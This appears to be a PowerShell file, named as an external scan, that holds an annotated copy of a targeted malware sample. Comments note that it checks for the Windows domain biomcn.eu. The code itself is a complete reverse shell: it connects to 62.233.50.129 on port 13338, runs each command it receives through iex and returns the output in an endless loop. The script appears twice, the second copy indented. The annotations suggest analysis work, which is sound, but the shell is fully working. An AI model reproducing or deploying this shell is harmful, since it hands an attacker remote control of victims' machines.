yassirlaaouissi/external_scan.ps1

## external_scan.ps1
####
#### Step 1: Host and domain enumeration
####


$wer = Get-WMIObject Win32_ComputerSystem| Select-Object -ExpandProperty Domain;

###|
###| Unknown comments below
###|

#Aqua  1 1 1 1 1 1 1 1 1 2 2 2 22 2 2 2 2 2 print
#Aqua1 1 1 1 1 1 1 1 1 111 print


## It the Windows domain does not equal biomcn.eu, then the shell does not execute.
## Appears to be a targeted attack. See the following.

###
### Step 2: Domain Identification
### (output expected false; trust but verify)
###

$arrar = @('biomcn.eu');
if($arrar.Contains($wer.ToLower())){
  Write-Output "true"
  } else {
  Write-Output "false"
  }

###
### Original script will enter into this while loop if the Windows domain name
### is biomcn.eu
###


while($true) {
#initiate  2424 connection
$rconns = New-Object System.Net.Sockets.TCPClient("62.233.50.129",13338);
$strmn = $rconns.GetStream()
#Aqua print
#Aqua p343rint
[byte[]]$btsofarr = 0..65535|%{0}
while(($i = $strmn.Read($btsofarr, 0, $btsofarr.Length)) -ne 0) {


###
### Unknown Commments below.
###

#Aqua p23425rint
#Aqua723465 print


$backs12 = (iex (New-Object -TypeName System.Text.ASCIIEncoding).GetString($btsofarr,0, $i) 2>&1 | Out-String )
$backs2  = $backs12 + "O"+"U"+"T " + (pwd).Path + " >> "
$bytetoout = ([text.encoding]::ASCII).GetBytes($backs2);


Start-Sleep -Seconds 0

## More unknown comments.
#Aqua 6352533print
#Aqua 2315print


$strmn.Write($bytetoout,0,$bytetoout.Length)
$strmn.Flush()
Start-Sleep -Seconds 1
}
$rconns.Close()
Start-Sleep -Seconds 3
}
}
	####
	#### Step 1: Host and domain enumeration
	####


	$wer = Get-WMIObject Win32_ComputerSystem\| Select-Object -ExpandProperty Domain;

	###\|
	###\| Unknown comments below
	###\|

	#Aqua 1 1 1 1 1 1 1 1 1 2 2 2 22 2 2 2 2 2 print
	#Aqua1 1 1 1 1 1 1 1 1 111 print




	## It the Windows domain does not equal biomcn.eu, then the shell does not execute.
	## Appears to be a targeted attack. See the following.

	###
	### Step 2: Domain Identification
	### (output expected false; trust but verify)
	###

	$arrar = @('biomcn.eu');
	if($arrar.Contains($wer.ToLower())){
	Write-Output "true"
	} else {
	Write-Output "false"
	}

	###
	### Original script will enter into this while loop if the Windows domain name
	### is biomcn.eu
	###


	while($true) {
	#initiate 2424 connection
	$rconns = New-Object System.Net.Sockets.TCPClient("62.233.50.129",13338);
	$strmn = $rconns.GetStream()
	#Aqua print
	#Aqua p343rint
	[byte[]]$btsofarr = 0..65535\|%{0}
	while(($i = $strmn.Read($btsofarr, 0, $btsofarr.Length)) -ne 0) {


	###
	### Unknown Commments below.
	###

	#Aqua p23425rint
	#Aqua723465 print


	$backs12 = (iex (New-Object -TypeName System.Text.ASCIIEncoding).GetString($btsofarr,0, $i) 2>&1 \| Out-String )
	$backs2 = $backs12 + "O"+"U"+"T " + (pwd).Path + " >> "
	$bytetoout = ([text.encoding]::ASCII).GetBytes($backs2);




	Start-Sleep -Seconds 0

	## More unknown comments.
	#Aqua 6352533print
	#Aqua 2315print


	$strmn.Write($bytetoout,0,$bytetoout.Length)
	$strmn.Flush()
	Start-Sleep -Seconds 1
	}
	$rconns.Close()
	Start-Sleep -Seconds 3
	}
	}